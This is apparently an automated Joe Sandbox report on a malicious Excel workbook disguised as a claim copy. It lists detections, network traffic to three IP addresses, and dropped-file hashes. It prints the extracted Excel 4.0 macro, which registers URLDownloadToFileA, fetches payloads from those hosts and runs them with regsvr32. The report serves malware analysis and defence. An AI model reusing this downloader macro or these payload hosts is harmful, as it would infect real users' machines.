Windows Analysis Report ClaimCopy-355714047-12022021.xlsb
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Found protected and hidden Excel 4.0 Macro sheet | Show sources |
Source: | Initial sample: |
Source: | Macro extractor: | ||
Source: | Macro extractor: |
Source: | Code function: | 0_2_02197820 | |
Source: | Code function: | 0_2_02196753 | |
Source: | Code function: | 0_2_02196340 | |
Source: | Code function: | 0_2_02196743 | |
Source: | Code function: | 0_2_021966F3 | |
Source: | Code function: | 0_2_021966E8 |
Source: | Virustotal: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting2 | Path Interception | Process Injection2 | Masquerading1 | OS Credential Dumping | Virtualization/Sandbox Evasion1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection2 | NTDS | System Information Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
10% | Virustotal | Browse |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| low |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.142.211.62 | unknown | Russian Federation | 208861 | RACKTECHRU | false | |
158.69.133.78 | unknown | Canada | 16276 | OVHFR | false | |
185.82.126.78 | unknown | Latvia | 52173 | MAKONIXLV | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 532933 |
Start date: | 02.12.2021 |
Start time: | 20:48:05 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 9m 13s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ClaimCopy-355714047-12022021.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 14 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLSB@13/5@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
20:51:17 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
45.142.211.62 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
158.69.133.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
185.82.126.78 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
RACKTECHRU | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
MAKONIXLV | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
OVHFR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85681 |
Entropy (8bit): | 7.915850776614707 |
Encrypted: | false |
SSDEEP: | 1536:wB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUw:Pc6EehCfCZpUHKGXbBKsiit |
MD5: | 4F100E2CEFED046B44EC799015B454EF |
SHA1: | 5149E5D1B5212C77B3548914E9B47D67B4BEA574 |
SHA-256: | D30B441AB0E88A1487F29A80D63E2A4865A3F5DF7854FB8359B354397F807E2C |
SHA-512: | 153581151434815CC17E88D587FF6A6AF8F7154B4A05146453A9814F662C68D79F1063BDD9F789A1DB2F5818D199EF600703F8BC35785B0705332EC231F35A14 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99428 |
Entropy (8bit): | 7.830390761754352 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUBy:I3c6EehCfCZpUHKGXbBKsiiv |
MD5: | DE0865E59F5EB8038E646D9789819DD6 |
SHA1: | 094D57774070BACAAA69C3A6BDCFA2B9743301AA |
SHA-256: | 34787D413A8BDB2B87D671E22E5C648AFD41C8B4E7E10BE09E6D2D827CED6AD8 |
SHA-512: | 7A5542ADC0BEADFE3118BFDDE11D7153153E8AC6DEC48F5A7838A73E87F1BE1F8ADF2B8868139B47E8D717F1CD7972A2D88E691B525357BC0F2D15C00A2F31AA |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 99428 |
Entropy (8bit): | 7.830390761754352 |
Encrypted: | false |
SSDEEP: | 1536:IIB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUBy:I3c6EehCfCZpUHKGXbBKsiiv |
MD5: | DE0865E59F5EB8038E646D9789819DD6 |
SHA1: | 094D57774070BACAAA69C3A6BDCFA2B9743301AA |
SHA-256: | 34787D413A8BDB2B87D671E22E5C648AFD41C8B4E7E10BE09E6D2D827CED6AD8 |
SHA-512: | 7A5542ADC0BEADFE3118BFDDE11D7153153E8AC6DEC48F5A7838A73E87F1BE1F8ADF2B8868139B47E8D717F1CD7972A2D88E691B525357BC0F2D15C00A2F31AA |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.831014482033694 |
TrID: |
|
File name: | ClaimCopy-355714047-12022021.xlsb |
File size: | 99677 |
MD5: | 1f51fa867f5bbce3ab1cc40bf75f7f9b |
SHA1: | 2c690539b53f4db35af92e2b88880c3d76fcd323 |
SHA256: | f3dc3443c7ba185b1c8eff63807384e9bb6734fa0774d9964213dd9baf3fb3c3 |
SHA512: | cf98c415cee36aa57815e5f0b2a0708ca7035ec34c46848cc47fb07859d013f5f9c5651d32478a2fe4ef62730cf450570d28ae18ec884a8a0612e739a37e8f84 |
SSDEEP: | 1536:rMB5SOqcuTUdehXyvl0f4CZpUcab2GFVbgPuDF7exsylBviKsUfp:/c6EehCfCZpUHKGXbBKsiiOp |
File Content Preview: | PK..........!...~.............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2ea8aa4b4b4b4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "ClaimCopy-355714047-12022021.xlsb" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
8,6,=Drozd(0,"http://"&Tiposa!E21&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet1.ocx",0,0) 9,6,=Drozd(0,"http://"&Tiposa!E22&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet2.ocx",0,0) 10,6,=Drozd(0,"http://"&Tiposa!E23&Tiposa!G22&Tiposa!G23,"C:\ProgramData\Volet3.ocx",0,0) 11,6,=Drozd(0,"http://"&Tiposa!E24&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet4.ocx",0,0) 12,6,=Drozd(0,"http://"&Tiposa!E25&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet5.ocx",0,0) 13,6,=Drozd(0,"http://"&Tiposa!E26&Tiposa!G22&Tiposa!G24,"C:\ProgramData\Volet6.ocx",0,0) 15,6,=EXEC("regsvr32 C:\ProgramData\Volet1.ocx") 16,6,=EXEC("regsvr32 C:\ProgramData\Volet2.ocx") 17,6,=EXEC("regsvr32 C:\ProgramData\Volet3.ocx") 18,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx") 19,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx") 20,6,=EXEC("regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx") 23,6,=HALT()
1,1,523 4,9,34543 4,12,43 5,2,ui 5,9,7 5,14,43 6,14,36 7,0,ug 7,1,еу5цу5 8,9,34 8,10,5 9,1,y 9,16,346 10,7,rt 10,8,345 10,9,u 11,2,23 11,7,ertertyh57s5ry 11,11,5 11,12,35 12,1,65 12,2,7 12,9,r67 13,2,mfy 13,7,65 13,10,7 13,14,34 13,15,543 14,0,uh 14,1,y 15,0,7 15,7,65 15,10,ae46 16,2,d7 16,3,uRl 17,3,="Mon" 17,9,dt 17,10,6 17,12,u 17,13,5 18,3,="URLDownloadTo" 18,8,yu 18,10,sb 18,14,5 19,3,="JJCCBB" 19,7,f 20,0,7 20,1,7 20,4,185.82.126.78/ 20,7,523 20,8,u 21,0,md 21,4,158.69.133.78/ 21,6,=RANDBETWEEN(142536473,988879789754) 21,9,s 21,11,m 22,1,7 22,4,45.142.211.62/ 22,6,=".dat" 22,8,6 23,4,45.142.211.62/ 23,6,=".dat2" 23,11,4 23,15,46 24,4,185.82.126.78/ 24,6,=REGISTER(D17&D18,D19&"FileA",D20,"Drozd",,1,9) 24,8,23 24,14,6 24,15,43 25,1,567 25,4,158.69.133.78/ 25,10,23 25,13,5 28,2,756 37,6,=GOTO(Tiposa1!G8)
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
12/02/21-20:49:37.323864 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
12/02/21-20:51:44.215042 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2021 20:48:54.626154900 CET | 49165 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:48:57.630085945 CET | 49165 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:03.636632919 CET | 49165 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:15.637351036 CET | 49166 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:18.645231009 CET | 49166 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:24.651915073 CET | 49166 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:49:36.713799000 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:36.818370104 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:49:36.818533897 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:36.819761992 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:36.924511909 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:49:37.323863983 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:49:37.324137926 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:49:37.353714943 CET | 49168 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:49:40.362343073 CET | 49168 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:49:46.368721008 CET | 49168 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:49:58.384051085 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:01.393110991 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:07.399558067 CET | 49169 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:19.450882912 CET | 49170 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:22.454773903 CET | 49170 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:28.461352110 CET | 49170 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:40.478084087 CET | 49171 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:42.331336975 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:50:42.331557989 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:50:43.470313072 CET | 49171 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:50:46.482115030 CET | 49167 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:50:46.586806059 CET | 80 | 49167 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:50:49.476433039 CET | 49171 | 80 | 192.168.2.22 | 45.142.211.62 |
Dec 2, 2021 20:51:01.547184944 CET | 49173 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:04.562812090 CET | 49173 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:10.569520950 CET | 49173 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:22.568156958 CET | 49174 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:25.578001022 CET | 49174 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:31.584599972 CET | 49174 | 80 | 192.168.2.22 | 185.82.126.78 |
Dec 2, 2021 20:51:43.609333038 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:51:43.712430000 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:51:43.712620020 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:51:43.713840008 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:51:43.816886902 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:51:44.215042114 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:51:44.215229034 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:52:44.490155935 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
Dec 2, 2021 20:52:44.593305111 CET | 80 | 49175 | 158.69.133.78 | 192.168.2.22 |
Dec 2, 2021 20:52:44.593637943 CET | 49175 | 80 | 192.168.2.22 | 158.69.133.78 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49167 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 20:49:36.819761992 CET | 0 | OUT | |
Dec 2, 2021 20:49:37.323863983 CET | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49175 | 158.69.133.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2021 20:51:43.713840008 CET | 3 | OUT | |
Dec 2, 2021 20:51:44.215042114 CET | 4 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 20:48:14 |
Start date: | 02/12/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f060000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:06 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 20:51:07 |
Start date: | 02/12/2021 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff3d0000 |
File size: | 19456 bytes |
